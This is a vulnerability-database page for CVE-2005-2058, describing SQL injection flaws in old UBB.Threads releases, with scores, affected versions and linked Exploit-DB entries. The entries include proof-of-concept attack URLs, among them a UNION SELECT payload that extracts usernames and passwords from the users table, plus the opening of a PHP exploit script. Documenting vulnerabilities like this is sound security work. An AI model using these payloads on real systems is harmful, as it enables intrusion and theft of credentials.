CVE-2005-2058
published 2005-06-29CVE-2005-2058: Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number…
PriorityP336high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.24%
65.3th percentile
Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number parameter to (1) download.php, (2) modifypost.php, (3) mailthread.php, or (4) notifymod.php, (5) month or (6) year parameter to calendar.php, (7) message parameter to viewmessage.php, (8) main parameter to addfav.php, or (9) posted parameter to grabnext.php.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
| ubbcentral | ubb.threads | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection
exploitdb·2005-06-25
CVE-2005-2058 UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection
UBBCentral UBB.Threads Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#
# And Iranian Hacking & Security Teams :
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
#############################################################################
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if (( $dirs[$ab] == "/" ) && ( $dirs[$ac] == "/" )) {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {
echo "Can't Connect\n";
} else {
$m
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
exploitdb·2005-06-24
CVE-2005-2058 UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/download.php?Number=42227[SQL]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111963737202040&w=2http://www.gulftech.org/?node=research&article_id=00084-06232005http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351http://marc.info/?l=bugtraq&m=111963737202040&w=2http://www.gulftech.org/?node=research&article_id=00084-06232005http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351
2005-06-29
Published